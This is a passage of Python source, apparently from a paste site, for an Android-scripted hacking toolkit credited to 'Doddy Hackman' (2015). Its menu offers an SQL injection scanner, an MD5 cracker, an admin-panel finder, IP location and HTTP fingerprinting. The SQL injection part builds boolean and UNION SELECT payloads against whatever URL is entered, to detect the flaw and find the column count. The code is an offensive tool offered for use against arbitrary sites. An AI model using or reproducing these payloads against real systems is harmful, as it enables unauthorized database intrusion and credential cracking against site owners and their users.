- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- web = ref['value']
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
- aplicacion.dialogShow()
- pass1,pass2 = bypass("--")
- code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
- codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
- if not code==codedos:
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- pass1,pass2 = bypass("--")
- rtacondata = ""
- control_sql = 0
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
- aplicacion.dialogShow()
- number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
- for te in range(2,30):
- number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
- code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
- if(regexver(code)):
- numbers = regexdar(code)
- control_sql = 1
- rtacondata = rtacondata + "[+] Column length : "+str(te)
- rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
- sql = ""
- tex = te + 1
- for sqlix in range(2,tex):
- sql = str(sql)+","+str(sqlix)
- sqli = str(1)+sql
- sqla = reem(sqli,numbers[0])
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
- menusql()
- if control_sql==0:
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- aplicacion.exit()
- else:
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- aplicacion.exit()
- if re2==2 :
- aplicacion.dialogCreateAlert("MD5 Cracker")
- aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- target = ref['value']
- aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
- aplicacion.dialogShow()
- don = crackmd5(target)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("MD5 Cracker",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==3 :
- aplicacion.dialogCreateAlert("Admin Finder")
- aplicacion.dialogGetInput("Admin Finder","Enter Target")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- target = ref['value']
- aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
- aplicacion.dialogShow()
- don = scanpanel(target)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("Admin Finder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==4 :
- aplicacion.dialogCreateAlert("LocateIP")
- aplicacion.dialogGetInput("LocateIP","Enter Target")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- target = ref['value']
- aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
- aplicacion.dialogShow()
- don = locateip(target)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("LocateIP",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==5 :
- aplicacion.dialogCreateAlert("HTTP FingerPrinting")
- aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- target = ref['value']
- aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
- aplicacion.dialogShow()
- don = httpfinger(target)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==6 :
- menuencoder()
- if re2==7 :
- about = "This program was written by Doddy Hackman in the summer of 2015"
- aplicacion.dialogCreateAlert("About",about)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==8 :
- aplicacion.exit()
- menu()
- # The End ?
Add Comment
Please, Sign In to add comment